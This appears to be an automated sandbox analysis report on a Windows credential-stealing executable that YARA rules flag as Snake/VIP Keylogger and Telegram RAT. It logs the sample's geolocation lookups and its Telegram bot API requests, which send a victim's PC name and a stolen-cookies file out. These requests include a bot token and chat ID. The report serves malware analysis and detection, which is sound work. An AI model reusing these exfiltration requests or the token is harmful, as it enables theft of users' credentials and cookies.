2025-01-11 07:08:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49776	104.21.112.1	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 07:08:35 UTC	859	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1894104 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pfrrur%2Fetbsdkb6jSCK%2BL8O1Alm%2BjlKSH3pMxYYWEppNxDvzYQCb6VRNYD239V0omIq3uwViUES3otLgqn4OjhU6FST5%2BnqWFFsA45gefIXfSjcNj%2B3wLJxiWQC3myjihAiZMv3m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900313932dcf424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1551&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1822721&cwnd=248&unsent_bytes=0&cid=f822e08d91c40137&ts=126&x=0"
2025-01-11 07:08:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49784	104.21.112.1	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:36 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 07:08:36 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1894105 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ItUUWH6%2BnVF1b3meniiZVfbiLyfffvJgTGnEalGOL%2FZNrj4s4GKNtplgLnotkLuPeptAo2jHGdwwb4iiCNkPjE35Cs%2F2E6KplaX7fysiWGaNuJr3KHZ6z3uQ71zrQKgv%2BYFECWYT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90031399fbc2424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1597&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1811414&cwnd=248&unsent_bytes=0&cid=4c88da7d407dcc99&ts=155&x=0"
2025-01-11 07:08:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49792	104.21.112.1	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:37 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 07:08:37 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1894107 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kzlp%2BjXMc7cVUdMy1ckJK4qkpdLDv4IyZXMxCEkou3l0QABnI%2FkRK9ud00cNPqQAGrdREIbtRfceHclq7vCEjQ%2BndjRx7PcxCLkGe2L4dcDWiPhXrmbTML7W9zv4j1yeHZdTrml"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900313a0aa730f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1590&rtt_var=642&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1836477&cwnd=221&unsent_bytes=0&cid=36cedf08dcb4d34f&ts=124&x=0"
2025-01-11 07:08:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49802	104.21.112.1	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:38 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 07:08:38 UTC	853	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1894108 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJ0FMWaa6g6y0wo5p%2FCjVZTBJqe2fpEtAT3eFKqQPIXscWh4lupZW0ENTbk9koASjIqWxmQHgoscy3YmiJCrTzQRAlngLuddLV7rtPG24R6NlIMLyKpcT6VueY23388%2BhrCgWuW8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900313a74fc743b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1559&rtt_var=596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1820448&cwnd=203&unsent_bytes=0&cid=12839b1e16d6aea2&ts=134&x=0"
2025-01-11 07:08:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49809	104.21.112.1	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:39 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 07:08:40 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1894109 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gKP1nKh6Dqm2DWTXku6U7T%2FYMaPTNO6aXiRzXYoc5CmtEGjHUg%2B6rnqQjtAdUz671sPUu0yHaxZMNKmyhQ3dIaEh9Z3%2BrnR4jhM9RehYtz6Bk3Wz6BpQN5IjkNcRo8cnV4XBLEnG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900313ae0a68424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1580&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1848101&cwnd=248&unsent_bytes=0&cid=5ef58477671ded34&ts=145&x=0"
2025-01-11 07:08:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49821	104.21.112.1	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 07:08:41 UTC	861	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:08:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1894110 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fy8a7JtDEXhyQ3XEtnzqtjqDQ7NzcX87e4k1Y4yNzQS0gNJk%2Fg%2BkEPxl9%2FFxk0l52L7bP7G9pyoamVsGBdx%2Bl1t1la%2FaFgE5%2BThGCepPZkkR1tK0z67DsosPuaO9UYY4D6DhgG7i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900313b4bd63729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1952&rtt_var=743&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1460730&cwnd=169&unsent_bytes=0&cid=5bb59aab314f2cc0&ts=135&x=0"
2025-01-11 07:08:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49824	149.154.167.220	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:41 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:14:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-11 07:08:42 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 07:08:41 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 07:08:42 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49874	149.154.167.220	443	7664	C:\Users\user\Desktop\x8M2g1Xxhz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:08:49 UTC	348	OUT	POST /bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830304904&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd329d9dfe367a Host: api.telegram.org Content-Length: 1277
2025-01-11 07:08:49 UTC	1277	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 39 64 39 64 66 65 33 36 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 74 69 6e 61 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 37 30 34 36 37 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 31 2f 30 31 2f 32 30 32 35 20 2f 20 Data Ascii: --------------------------8dd329d9dfe367aContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:704672Date and Time: 11/01/2025 /
2025-01-11 07:08:49 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 07:08:49 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 07:08:49 UTC	56	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}

Target ID:	0
Start time:	02:08:28
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\x8M2g1Xxhz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\x8M2g1Xxhz.exe"
Imagebase:	0x400000
File size:	2'841'088 bytes
MD5 hash:	6776D32ED5B26C788E25C1632B555D47
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3798081243.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	50.9%
Signature Coverage:	39.6%
Total number of Nodes:	338
Total number of Limit Nodes:	25

Executed Functions

Function 004019F0 Relevance: 111.0, APIs: 14, Strings: 49, Instructions: 766
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FE
_getenv.LIBCMT ref: 00401ABA
CloseHandle.KERNEL32(00000000), ref: 00401DC4
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD

Strings

v, xrefs: 0040212C
D, xrefs: 00401DFB
:, xrefs: 00401B28
%, xrefs: 004020FA
v, xrefs: 00401E4B
*, xrefs: 00401A1F
x, xrefs: 0040214A
{, xrefs: 0040211D
5, xrefs: 00402109
h, xrefs: 00401A6F
U, xrefs: 004020F5
), xrefs: 0040202E
W, xrefs: 00402033
", xrefs: 00401B0F
!, xrefs: 004020CF
., xrefs: 00401B0A
W, xrefs: 00401B14
